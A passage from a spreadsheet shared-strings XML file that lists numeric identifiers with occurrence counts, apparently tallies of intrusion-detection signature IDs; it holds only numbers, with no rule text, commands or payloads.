  </si>
  <si>
    <t>2002752 (3), 2002749 (3), 2001117 (3)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2001117</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100527</t>
  </si>
  <si>
    <t>2002749 (3)</t>
  </si>
  <si>
    <t>2002749 (1)</t>
  </si>
  <si>
    <t>2002752 (5), 2002749 (5)</t>
  </si>
  <si>
    <t>2002752 (3), 2002749 (3)</t>
  </si>
  <si>
    <t>42944, 41978</t>
  </si>
  <si>
    <t>1421 (1), 1418 (1)</t>
  </si>
  <si>
    <t>1421, 1418</t>
  </si>
  <si>
    <t>402 (28)</t>
  </si>
  <si>
    <t>402</t>
  </si>
  <si>
    <t>1325 (1)</t>
  </si>
  <si>
    <t>1325</t>
  </si>
  <si>
    <t>1917 (20)</t>
  </si>
  <si>
    <t>1917</t>
  </si>
  <si>
    <t>384 (1), 453 (1), 408 (1), 451 (1), 1421 (1), 1420 (1), 1418 (1), 257 (1), 598 (1)</t>
  </si>
  <si>
    <t>384, 453, 408, 451, 1421, 1420, 1418, 257, 598</t>
  </si>
  <si>
    <t>1394 (34)</t>
  </si>
  <si>
    <t>1394</t>
  </si>
  <si>
    <t>29456 (16), 384 (16), 408 (16)</t>
  </si>
  <si>
    <t>29456, 384, 408</t>
  </si>
  <si>
    <t>402 (1)</t>
  </si>
  <si>
    <t>1917 (12)</t>
  </si>
  <si>
    <t>1917 (4)</t>
  </si>
  <si>
    <t>1394 (1)</t>
  </si>
  <si>
    <t>1061 (1), 1122 (1), 1147 (1)</t>
  </si>
  <si>
    <t>1061, 1122, 1147</t>
  </si>
  <si>
    <t>254 (1)</t>
  </si>
  <si>
    <t>254</t>
  </si>
  <si>
    <t>254 (2)</t>
  </si>
  <si>
    <t>402 (669)</t>
  </si>
  <si>
    <t>402 (12)</t>
  </si>
  <si>
    <t>408 (1002)</t>
  </si>
  <si>
    <t>408</t>
  </si>
  <si>
    <t>402 (15)</t>
  </si>
  <si>
    <t>402 (5278)</t>
  </si>
  <si>
    <t>402 (4856)</t>
  </si>
  <si>
    <t>40063 (92)</t>
  </si>
  <si>
    <t>254 (5)</t>
  </si>
  <si>
    <t>1292 (2)</t>
  </si>
  <si>
    <t>1292</t>
  </si>
  <si>
    <t>1200 (1)</t>
  </si>
  <si>
    <t>1200</t>
  </si>
  <si>
    <t>366 (5), 29456 (5), 384 (5), 408 (5)</t>
  </si>
  <si>
    <t>366, 29456, 384, 408</t>
  </si>
  <si>
    <t>459 (1), 402 (1)</t>
  </si>
  <si>
    <t>459, 402</t>
  </si>
  <si>
    <t>1421 (2), 1418 (2)</t>
  </si>
  <si>
    <t>24253 (2)</t>
  </si>
  <si>
    <t>24253</t>
  </si>
  <si>
    <t>1325 (3)</t>
  </si>
  <si>
    <t>1411 (396), 1417 (396)</t>
  </si>
  <si>
    <t>1411, 1417</t>
  </si>
  <si>
    <t>254 (3)</t>
  </si>
  <si>
    <t>12 (4), 1 (1), 15 (1)</t>
  </si>
  <si>
    <t>12, 1, 15</t>
  </si>
  <si>
    <t>18 (2), 3 (1)</t>
  </si>
  <si>
    <t>12 (15), 2027792 (5), 2027794 (5), 2027793 (5), 2027326 (2)</t>
  </si>
  <si>
    <t>12, 2027792, 2027794, 2027793, 2027326</t>
  </si>
  <si>
    <t>12 (11), 2044073 (6)</t>
  </si>
  <si>
    <t>12, 2044073</t>
  </si>
  <si>
    <t>12 (4), 15 (1), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>12, 15, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>12 (63), 2000418 (1)</t>
  </si>
  <si>
    <t>12, 2000418</t>
  </si>
  <si>
    <t>2043217 (5), 2034567 (1), 2013028 (1), 2016992 (1)</t>
  </si>
  <si>
    <t>2043217, 2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>12 (6), 2035480 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>12, 2035480, 2025644</t>
  </si>
  <si>
    <t>2009714 (265), 12 (166), 2049400 (150), 60401 (70), 2010920 (41), 2016141 (39), 2101402 (28), 2009362 (24), 2009361 (23), 2027250 (17), 2017442 (17), 2021390 (14), 33 (13), 2101245 (13), 2027265 (12), 2019526 (11), 2100987 (8), 2100977 (8), 2100981 (8), 2101244 (6), 2017440 (6), 14 (5), 25975 (5), 2006446 (5), 2010963 (5), 2016184 (5), 2101018 (5), 2101129 (4), 2030337 (4), 2101201 (4), 16431 (3), 2101242 (3), 2027263 (3), 2027253 (3), 2100993 (3), 2101401 (3), 2011042 (3), 2101013 (3), 2002901 (3), 31 (2), 24342 (2), 2101071 (2), 2027262 (2), 2018752 (2), 2101145 (2), 2010766 (2), 2101016 (2), 2101877 (2), 2009485 (2), 2100982 (2), 2101403 (2), 2011564 (2), 2002879 (2), 2008897 (2), 2017441 (2), 19 (1), 25977 (1), 21516 (1), 18 (1), 2002677 (1), 2101256 (1), 2019714 (1), 2049401 (1), 2101108 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 2101487 (1), 2102073 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959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 2017436 (1)</t>
  </si>
  <si>
    <t>2009714, 12, 2049400, 60401, 2010920, 2016141, 2101402, 2009362, 2009361, 2027250, 2017442, 2021390, 33, 2101245, 2027265, 2019526, 2100987, 2100977, 2100981, 2101244, 2017440, 14, 25975, 2006446, 2010963, 2016184, 2101018, 2101129, 2030337, 2101201, 16431, 2101242, 2027263, 2027253, 2100993, 2101401, 2011042, 2101013, 2002901, 31, 24342, 2101071, 2027262, 2018752, 2101145, 2010766, 2101016, 2101877, 2009485, 2100982, 2101403, 2011564, 2002879, 2008897, 2017441, 19, 25977, 21516, 18, 2002677, 2101256, 2019714, 2049401, 2101108, 2100952, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2101487, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959,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 2017436</t>
  </si>
  <si>
    <t>2009358 (4), 2024364 (4), 2010937 (1), 2010939 (1), 2010938 (1), 2002911 (1), 2010936 (1), 2010935 (1), 2002910 (1), 2100257 (1), 2100598 (1)</t>
  </si>
  <si>
    <t>2009358, 2024364, 2010937, 2010939, 2010938, 2002911, 2010936, 2010935, 2002910, 2100257, 2100598</t>
  </si>
  <si>
    <t>2018359 (908), 2033952 (454), 18 (7), 12 (5), 2053459 (2), 2035480 (2), 2025644 (2), 3 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2018359, 2033952, 18, 12, 2053459, 2035480, 2025644, 3, 2018959</t>
  </si>
  <si>
    <t>2043217 (11), 28 (1), 2034567 (1), 2013028 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>2043217, 28, 2034567, 2013028, 2019240</t>
  </si>
  <si>
    <t>5 (22), 2043217 (7), 7 (2), 2016538 (2), 2018959 (1), 2014520 (1)</t>
  </si>
  <si>
    <t>5, 2043217, 7, 2016538, 2018959, 2014520</t>
  </si>
  <si>
    <t>12 (2), 28 (1), 2034567 (1), 2013028 (1), 2019240 (1), 2044770 (1)</t>
  </si>
  <si>
    <t>12, 28, 2034567, 2013028, 2019240, 2044770</t>
  </si>
  <si>
    <t>12 (5), 2000418 (3), 1 (1), 2014906 (1)</t>
  </si>
  <si>
    <t>12, 2000418, 1, 2014906</t>
  </si>
  <si>
    <t>2026850 (19), 19 (4), 12 (3)</t>
  </si>
  <si>
    <t>2026850, 19, 12</t>
  </si>
  <si>
    <t>2034567 (5), 2013028 (5), 12 (1), 2000418 (1)</t>
  </si>
  <si>
    <t>2034567, 2013028, 12, 2000418</t>
  </si>
  <si>
    <t>19439 (32), 2006446 (29), 2017808 (12), 2010963 (10), 19440 (6), 2017337 (6), 2011042 (5), 2016672 (4), 2011037 (2)</t>
  </si>
  <si>
    <t>19439, 2006446, 2017808, 2010963, 19440, 2017337, 2011042, 2016672, 2011037</t>
  </si>
  <si>
    <t>19439 (1), 19 (1), 2034567 (1), 2013028 (1)</t>
  </si>
  <si>
    <t>19439, 19, 2034567, 2013028</t>
  </si>
  <si>
    <t>2008538 (72), 2053459 (18), 2053468 (15), 2006446 (14), 2053465 (14), 2053480 (4), 2053466 (2), 19439 (1), 2017808 (1), 2049400 (1), 2009815 (1), 2009714 (1)</t>
  </si>
  <si>
    <t>2008538, 2053459, 2053468, 2006446, 2053465, 2053480, 2053466, 19439, 2017808, 2049400, 2009815, 2009714</t>
  </si>
  <si>
    <t>2021076 (12), 2022858 (8), 2016141 (8), 2018959 (6), 1 (4), 12 (3), 2035480 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2021076, 2022858, 2016141, 2018959, 1, 12, 2035480, 2025644</t>
  </si>
  <si>
    <t>12 (6), 2001330 (2)</t>
  </si>
  <si>
    <t>12, 2001330</t>
  </si>
  <si>
    <t>2009714 (5505), 5 (1)</t>
  </si>
  <si>
    <t>2009714, 5</t>
  </si>
  <si>
    <t>18 (23), 3 (23), 12 (14), 33 (2)</t>
  </si>
  <si>
    <t>18, 3, 12, 33</t>
  </si>
  <si>
    <t>41978 (15), 12 (6), 18 (5), 2102465 (2), 2035480 (2), 42944 (1), 3 (1), 2025992 (1), 2025649 (1), 2025650 (1), 2024297 (1), 2018959 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>41978, 12, 18, 2102465, 2035480, 42944, 3, 2025992, 2025649, 2025650, 2024297, 2018959, 2025644</t>
  </si>
  <si>
    <t>12 (2), 18 (2), 3 (1)</t>
  </si>
  <si>
    <t>12, 18, 3</t>
  </si>
  <si>
    <t>33 (26), 18 (26), 3 (23), 15 (21), 12 (18)</t>
  </si>
  <si>
    <t>33, 18, 3, 15, 12</t>
  </si>
  <si>
    <t>12 (5), 2035480 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>20 (249), 2019348 (63)</t>
  </si>
  <si>
    <t>20, 2019348</t>
  </si>
  <si>
    <t>2014153 (540), 20 (2)</t>
  </si>
  <si>
    <t>2014153, 20</t>
  </si>
  <si>
    <t>15 (6), 4 (5), 12 (5), 8 (2)</t>
  </si>
  <si>
    <t>15, 4, 12, 8</t>
  </si>
  <si>
    <t>18 (150), 12 (63), 2012870 (1)</t>
  </si>
  <si>
    <t>18, 12, 2012870</t>
  </si>
  <si>
    <t>20 (908), 12 (256)</t>
  </si>
  <si>
    <t>20, 12</t>
  </si>
  <si>
    <t>12 (8), 1 (3), 5 (1)</t>
  </si>
  <si>
    <t>12, 1, 5</t>
  </si>
  <si>
    <t>33 (8), 18 (8), 3 (8), 15 (1)</t>
  </si>
  <si>
    <t>33, 18, 3, 15</t>
  </si>
  <si>
    <t>2008118 (93), 5 (11), 12 (2), 2008120 (2), 7 (1), 2008119 (1), 2019240 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2008118, 5, 12, 2008120, 7, 2008119, 2019240, 2018959</t>
  </si>
  <si>
    <t>18 (12), 2035480 (4), 3 (2), 12 (2), 2018959 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>18, 2035480, 3, 12, 2018959, 2025644</t>
  </si>
  <si>
    <t>12 (157), 18 (26), 2001330 (17), 3 (16), 2027413 (1)</t>
  </si>
  <si>
    <t>12, 18, 2001330, 3, 2027413</t>
  </si>
  <si>
    <t>20 (1169), 12 (25)</t>
  </si>
  <si>
    <t>2043343 (12), 2044076 (12), 12 (10), 1 (4), 2021076 (2), 2016141 (1), 2018959 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2043343, 2044076, 12, 1, 2021076, 2016141, 2018959, 2025644</t>
  </si>
  <si>
    <t>33 (2), 18 (2), 3 (1)</t>
  </si>
  <si>
    <t>2100366 (5), 20 (1)</t>
  </si>
  <si>
    <t>2100366, 20</t>
  </si>
  <si>
    <t>12 (13), 2010781 (10), 2025701 (2), 2025699 (1), 2027237 (1)</t>
  </si>
  <si>
    <t>12, 2010781, 2025701, 2025699, 2027237</t>
  </si>
  <si>
    <t>12 (7), 2000418 (3)</t>
  </si>
  <si>
    <t>12 (6), 2000418 (1)</t>
  </si>
  <si>
    <t>18 (1472), 3 (106), 15 (38), 12 (32), 33 (19), 20 (8)</t>
  </si>
  <si>
    <t>18, 3, 15, 12, 33, 20</t>
  </si>
  <si>
    <t>12 (21291), 2101201 (914), 2027250 (456), 2101129 (304), 2101071 (304), 2101016 (304), 2027263 (304), 2049402 (152), 2027261 (152), 2022520 (152), 2101145 (152), 2100993 (152), 2019526 (152), 2101877 (152), 2018413 (1), 2010229 (1)</t>
  </si>
  <si>
    <t>12, 2101201, 2027250, 2101129, 2101071, 2101016, 2027263, 2049402, 2027261, 2022520, 2101145, 2100993, 2019526, 2101877, 2018413, 2010229</t>
  </si>
  <si>
    <t>18 (26), 2009358 (10), 2024364 (10), 14 (4), 8 (3), 3 (3), 33 (3), 2010937 (3), 32 (2), 2010939 (2), 2010935 (2), 2010936 (2), 2002911 (1), 2002910 (1), 2023753 (1), 2018317 (1), 2034718 (1), 2013409 (1), 2034730 (1)</t>
  </si>
  <si>
    <t>18, 2009358, 2024364, 14, 8, 3, 33, 2010937, 32, 2010939, 2010935, 2010936, 2002911, 2002910, 2023753, 2018317, 2034718, 2013409, 2034730</t>
  </si>
  <si>
    <t>12 (183), 2101201 (4), 2027250 (3), 2101016 (2), 2027263 (2), 2049402 (1), 2101129 (1), 2101071 (1), 2027261 (1), 2022520 (1), 2101145 (1), 2010229 (1), 2100993 (1), 2019526 (1), 2101877 (1)</t>
  </si>
  <si>
    <t>12, 2101201, 2027250, 2101016, 2027263, 2049402, 2101129, 2101071, 2027261, 2022520, 2101145, 2010229, 2100993, 2019526, 2101877</t>
  </si>
  <si>
    <t>2043343 (4), 2044076 (4), 12 (3), 3 (3), 1 (1), 2012886 (1)</t>
  </si>
  <si>
    <t>2043343, 2044076, 12, 3, 1, 2012886</t>
  </si>
  <si>
    <t>12 (7), 5 (1), 4 (1)</t>
  </si>
  <si>
    <t>12, 5, 4</t>
  </si>
  <si>
    <t>12 (24), 2044770 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>12, 2044770, 2019240</t>
  </si>
  <si>
    <t>2013504 (157), 15 (26), 33 (18), 18 (18), 3 (17), 1 (10), 12 (1)</t>
  </si>
  <si>
    <t>2013504, 15, 33, 18, 3, 1, 12</t>
  </si>
  <si>
    <t>12 (16), 1 (2)</t>
  </si>
  <si>
    <t>12 (4), 2002752 (2), 2002749 (2), 1 (1), 15 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 1, 15</t>
  </si>
  <si>
    <t>12 (3), 2002752 (2), 2002749 (2), 1325 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 1325</t>
  </si>
  <si>
    <t>2002749 (14), 12 (6), 44728 (2), 2035480 (2), 2000419 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2002749, 12, 44728, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>29456 (16), 384 (16), 31767 (16), 408 (16), 2100384 (16), 2100408 (16), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>29456, 384, 31767, 408, 2100384, 2100408, 2002752, 2002749</t>
  </si>
  <si>
    <t>50447 (12), 2006409 (12), 2060251 (11), 2043217 (11), 23861 (6), 2002752 (4), 2002749 (4), 648 (3), 2060252 (3), 2101390 (2), 28 (1), 17458 (1), 1200 (1), 1390 (1), 2034567 (1), 2013028 (1), 2002824 (1), 2019240 (1), 2101200 (1)</t>
  </si>
  <si>
    <t>50447, 2006409, 2060251, 2043217, 23861, 2002752, 2002749, 648, 2060252, 2101390, 28, 17458, 1200, 1390, 2034567, 2013028, 2002824, 2019240, 2101200</t>
  </si>
  <si>
    <t>5 (22), 50447 (8), 2006409 (7), 2060251 (7), 2043217 (7), 23861 (3), 15306 (2), 648 (2), 7 (2), 2002752 (2), 2002749 (2), 2021076 (2), 2016538 (2), 2101390 (2), 11192 (1), 1200 (1), 1390 (1), 2006408 (1), 2018959 (1), 2014520 (1), 2101200 (1), 2060252 (1)</t>
  </si>
  <si>
    <t>5, 50447, 2006409, 2060251, 2043217, 23861, 15306, 648, 7, 2002752, 2002749, 2021076, 2016538, 2101390, 11192, 1200, 1390, 2006408, 2018959, 2014520, 2101200, 2060252</t>
  </si>
  <si>
    <t>23861 (9), 648 (2), 12 (2), 2002752 (2), 2002749 (2), 2101200 (2), 50447 (1), 28 (1), 17458 (1), 1200 (1), 26879 (1), 2006409 (1), 2034567 (1), 2013028 (1), 2002824 (1), 2019240 (1), 2044770 (1)</t>
  </si>
  <si>
    <t>23861, 648, 12, 2002752, 2002749, 2101200, 50447, 28, 17458, 1200, 26879, 2006409, 2034567, 2013028, 2002824, 2019240, 2044770</t>
  </si>
  <si>
    <t>50447 (19), 2002752 (2), 2002749 (2), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>50447, 2002752, 2002749, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>12 (5), 2000418 (3), 2002752 (2), 2002749 (2), 24378 (1), 1 (1), 2003303 (1), 2003410 (1), 2014906 (1), 2027768 (1)</t>
  </si>
  <si>
    <t>12, 2000418, 2002752, 2002749, 24378, 1, 2003303, 2003410, 2014906, 2027768</t>
  </si>
  <si>
    <t>2059126 (3), 2051116 (3), 2002752 (2), 2002749 (2), 44486 (1), 44484 (1), 44488 (1), 44487 (1), 44485 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 2002752, 2002749, 44486, 44484, 44488, 44487, 44485, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087</t>
  </si>
  <si>
    <t>50447 (2), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>50447, 2002752, 2002749</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 1394 (1), 17107 (1), 37961 (1), 50447 (1), 19439 (1), 17410 (1), 19 (1), 2034567 (1), 2013028 (1), 2002824 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 1394, 17107, 37961, 50447, 19439, 17410, 19, 2034567, 2013028, 2002824</t>
  </si>
  <si>
    <t>12 (2), 2002752 (2), 2002749 (2), 1325 (1)</t>
  </si>
  <si>
    <t>50447 (13108), 40890 (6548), 31939 (6548), 2009004 (6548), 2002749 (22)</t>
  </si>
  <si>
    <t>50447, 40890, 31939, 2009004, 2002749</t>
  </si>
  <si>
    <t>20 (249), 2002749 (110), 2019348 (63)</t>
  </si>
  <si>
    <t>20, 2002749, 2019348</t>
  </si>
  <si>
    <t>40063 (565), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>40063, 2002752, 2002749</t>
  </si>
  <si>
    <t>15 (6), 4 (5), 12 (5), 8 (2), 2002752 (2), 2002749 (2), 1325 (1)</t>
  </si>
  <si>
    <t>15, 4, 12, 8, 2002752, 2002749, 1325</t>
  </si>
  <si>
    <t>15578 (4822), 20 (908), 50447 (279), 12 (256), 24379 (247), 2002749 (7)</t>
  </si>
  <si>
    <t>15578, 20, 50447, 12, 24379, 2002749</t>
  </si>
  <si>
    <t>12 (2), 2002752 (2), 2002749 (2), 2006408 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 2006408</t>
  </si>
  <si>
    <t>20 (1169), 12 (25), 2002749 (18), 1292 (2), 2101292 (2), 47398 (1)</t>
  </si>
  <si>
    <t>20, 12, 2002749, 1292, 2101292, 47398</t>
  </si>
  <si>
    <t>12 (2), 2002752 (2), 2002749 (2), 13586 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 13586</t>
  </si>
  <si>
    <t>12 (6), 2002752 (2), 2002749 (2), 1325 (1), 2000418 (1), 2054218 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 1325, 2000418, 2054218</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 14 (1), 18 (1), 3 (1), 2003099 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 14, 18, 3, 2003099</t>
  </si>
  <si>
    <t>12 (14), 2002749 (1)</t>
  </si>
  <si>
    <t>12, 2002749</t>
  </si>
  <si>
    <t>50447 (171), 32481 (114), 31939 (57), 2012885 (57), 2009004 (57), 2011085 (57), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>50447, 32481, 31939, 2012885, 2009004, 2011085, 2002752, 2002749</t>
  </si>
  <si>
    <t>15 (2), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>15, 2002752, 2002749</t>
  </si>
  <si>
    <t>2010937 (1), 2010935 (1), 2010936 (1), 2010939 (1), 2002910 (1), 2002911 (1), 1421 (1), 1418 (1)</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 2002911, 1421, 1418</t>
  </si>
  <si>
    <t>402 (28), 12 (11), 2044073 (6)</t>
  </si>
  <si>
    <t>402, 12, 2044073</t>
  </si>
  <si>
    <t>12 (3), 1325 (1)</t>
  </si>
  <si>
    <t>12, 1325</t>
  </si>
  <si>
    <t>1917 (20), 12 (4), 15 (1), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>1917, 12, 15, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>2002 (665), 2009714 (265), 12 (166), 2049400 (150), 1122 (150), 1250 (94), 1560 (71), 60401 (70), 2010920 (41), 2016141 (39), 2565 (39), 2101402 (28), 1402 (28), 1301 (26), 1142 (26), 966 (26), 2009362 (24), 1288 (24), 2009361 (23), 1002 (23), 882 (23), 2027250 (17), 2017442 (17), 2021390 (14), 2152 (14), 33 (13), 2101245 (13), 1245 (13), 1147 (13), 2027265 (12), 2019526 (11), 1400 (10), 1774 (10), 977 (9), 1998 (9), 2100987 (8), 2100977 (8), 2100981 (8), 987 (8), 1385 (8), 1043 (8), 1044 (7), 2101244 (6), 2017440 (6), 918 (6), 1125 (6), 1286 (6), 1244 (6), 2077 (6), 1213 (6), 14 (5), 25975 (5), 2006446 (5), 2010963 (5), 2016184 (5), 2101018 (5), 1875 (5), 2228 (5), 928 (5), 1564 (5), 1500 (5), 1018 (5), 1637 (5), 2101129 (4), 2030337 (4), 2101201 (4), 1129 (4), 1880 (4), 962 (4), 1826 (4), 974 (4), 1827 (4), 930 (4), 1141 (4), 937 (4), 1201 (4), 1997 (4), 879 (4), 950 (4), 1542 (4), 944 (4), 943 (4), 1005 (4), 908 (4), 2410 (4), 16431 (3), 2101242 (3), 2027263 (3), 2027253 (3), 2100993 (3), 2101401 (3), 2011042 (3), 2101013 (3), 2002901 (3), 1242 (3), 1738 (3), 993 (3), 1848 (3), 1401 (3), 911 (3), 1376 (3), 1013 (3), 1019 (3), 979 (3), 1556 (3), 1254 (3), 31 (2), 24342 (2), 2101071 (2), 2027262 (2), 2018752 (2), 2101145 (2), 2010766 (2), 2101016 (2), 2101877 (2), 2009485 (2), 2100982 (2), 2101403 (2), 2011564 (2), 2002879 (2), 2008897 (2), 2017441 (2), 1071 (2), 1131 (2), 1130 (2), 971 (2), 1029 (2), 1145 (2), 2056 (2), 1172 (2), 1016 (2), 2076 (2), 1493 (2), 1148 (2), 1166 (2), 1765 (2), 903 (2), 1773 (2), 1828 (2), 1231 (2), 1667 (2), 1877 (2), 1212 (2), 940 (2), 1248 (2), 1175 (2), 932 (2), 1214 (2), 946 (2), 851 (2), 2144 (2), 43289 (2), 1037 (2), 1156 (2), 1119 (2), 1120 (2), 1816 (2), 1165 (2), 1614 (2), 1871 (2), 954 (2), 1031 (2), 2198 (2), 1557 (2), 1555 (2), 1873 (2), 1522 (2), 1523 (2), 895 (2), 2393 (2), 2295 (2), 19 (1), 25977 (1), 21516 (1), 18 (1), 2002677 (1), 2101256 (1), 2019714 (1), 2049401 (1), 2101108 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 2101487 (1), 2102073 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959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 2017436 (1), 1668 (1), 1852 (1), 913 (1), 914 (1), 912 (1), 985 (1), 853 (1), 999 (1), 1000 (1), 1486 (1), 857 (1), 1284 (1), 3201 (1), 986 (1), 1256 (1), 509 (1), 1482 (1), 1567 (1), 1568 (1), 1772 (1), 1080 (1), 1128 (1), 1076 (1), 1492 (1), 1146 (1), 1660 (1), 1528 (1), 1164 (1), 2484 (1), 1551 (1), 1150 (1), 1576 (1), 1152 (1), 1580 (1), 1153 (1), 1154 (1), 2062 (1), 1048 (1), 1103 (1), 1586 (1), 1577 (1), 1578 (1), 1579 (1), 931 (1), 2246 (1), 1587 (1), 992 (1), 875 (1), 1829 (1), 906 (1), 1517 (1), 2154 (1), 2358 (1), 1224 (1), 1491 (1), 1490 (1), 1611 (1), 1088 (1), 2000 (1), 1157 (1), 1767 (1), 1834 (1), 2347 (1), 2346 (1), 1835 (1), 922 (1), 1659 (1), 910 (1), 1722 (1), 1108 (1), 915 (1), 935 (1), 1163 (1), 2060 (1), 1173 (1), 1544 (1), 936 (1), 1230 (1), 1742 (1), 1743 (1), 1540 (1), 2138 (1), 1168 (1), 1407 (1), 805 (1), 1726 (1), 939 (1), 952 (1), 967 (1), 955 (1), 958 (1), 961 (1), 965 (1), 1847 (1), 1111 (1), 1592 (1), 43290 (1), 1481 (1), 1521 (1), 1123 (1), 1183 (1), 1160 (1), 807 (1), 1193 (1), 978 (1), 1023 (1), 1024 (1), 1487 (1), 2325 (1), 1162 (1), 1134 (1), 904 (1), 907 (1), 905 (1), 1215 (1), 1192 (1), 1155 (1), 1161 (1), 1202 (1), 1030 (1), 1040 (1), 887 (1), 878 (1), 1038 (1), 1022 (1), 1077 (1), 1078 (1), 1075 (1), 984 (1), 1073 (1), 1127 (1), 844 (1), 1585 (1), 1584 (1), 1582 (1), 1151 (1), 1575 (1), 1583 (1), 1581 (1), 2148 (1), 2151 (1), 1458 (1), 2137 (1), 2397 (1), 1525 (1), 2215 (1), 2223 (1), 1787 (1), 1724 (1), 1723 (1), 2204 (1), 2205 (1), 2206 (1), 2073 (1), 2225 (1), 2130 (1), 2131 (1), 2214 (1), 2086 (1), 2085 (1), 2219 (1), 2133 (1), 1434 (1), 1433 (1), 1872 (1), 1874 (1), 839 (1), 941 (1), 945 (1), 980 (1), 942 (1), 947 (1), 968 (1), 956 (1), 949 (1), 957 (1), 990 (1), 953 (1), 951 (1), 959 (1), 964 (1), 2447 (1), 1070 (1), 1559 (1), 2395 (1), 2326 (1), 2196 (1), 948 (1), 1851 (1), 1110 (1), 1489 (1), 1571 (1), 818 (1), 1032 (1), 1033 (1), 1034 (1), 1035 (1), 1036 (1), 2142 (1), 2141 (1), 1527 (1), 1526 (1), 902 (1), 1520 (1), 1209 (1), 1770 (1), 1769 (1), 1004 (1), 2276 (1), 2143 (1), 1671 (1), 2363 (1), 1399 (1), 1091 (1), 2285 (1), 2140 (1), 886 (1), 2281 (1), 2288 (1), 2298 (1), 43285 (1)</t>
  </si>
  <si>
    <t>2002, 2009714, 12, 2049400, 1122, 1250, 1560, 60401, 2010920, 2016141, 2565, 2101402, 1402, 1301, 1142, 966, 2009362, 1288, 2009361, 1002, 882, 2027250, 2017442, 2021390, 2152, 33, 2101245, 1245, 1147, 2027265, 2019526, 1400, 1774, 977, 1998, 2100987, 2100977, 2100981, 987, 1385, 1043, 1044, 2101244, 2017440, 918, 1125, 1286, 1244, 2077, 1213, 14, 25975, 2006446, 2010963, 2016184, 2101018, 1875, 2228, 928, 1564, 1500, 1018, 1637, 2101129, 2030337, 2101201, 1129, 1880, 962, 1826, 974, 1827, 930, 1141, 937, 1201, 1997, 879, 950, 1542, 944, 943, 1005, 908, 2410, 16431, 2101242, 2027263, 2027253, 2100993, 2101401, 2011042, 2101013, 2002901, 1242, 1738, 993, 1848, 1401, 911, 1376, 1013, 1019, 979, 1556, 1254, 31, 24342, 2101071, 2027262, 2018752, 2101145, 2010766, 2101016, 2101877, 2009485, 2100982, 2101403, 2011564, 2002879, 2008897, 2017441, 1071, 1131, 1130, 971, 1029, 1145, 2056, 1172, 1016, 2076, 1493, 1148, 1166, 1765, 903, 1773, 1828, 1231, 1667, 1877, 1212, 940, 1248, 1175, 932, 1214, 946, 851, 2144, 43289, 1037, 1156, 1119, 1120, 1816, 1165, 1614, 1871, 954, 1031, 2198, 1557, 1555, 1873, 1522, 1523, 895, 2393, 2295, 19, 25977, 21516, 18, 2002677, 2101256, 2019714, 2049401, 2101108, 2100952, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2101487, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959,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 2017436, 1668, 1852, 913, 914, 912, 985, 853, 999, 1000, 1486, 857, 1284, 3201, 986, 1256, 509, 1482, 1567, 1568, 1772, 1080, 1128, 1076, 1492, 1146, 1660, 1528, 1164, 2484, 1551, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 1586, 1577, 1578, 1579, 931, 2246, 1587, 992, 875, 1829, 906, 1517, 2154, 2358, 1224, 1491, 1490, 1611, 1088, 2000, 1157, 1767, 1834, 2347, 2346, 1835, 922, 1659, 910, 1722, 1108, 915, 935, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 1540, 2138, 1168, 1407, 805, 1726, 939, 952, 967, 955, 958, 961, 965, 1847, 1111, 1592, 43290, 1481, 1521, 1123, 1183, 1160, 807, 1193, 978, 1023, 1024, 1487, 2325, 1162, 1134, 904, 907, 905, 1215, 1192, 1155, 1161, 1202, 1030, 1040, 887, 878, 1038, 1022, 1077, 1078, 1075, 984, 1073, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 2148, 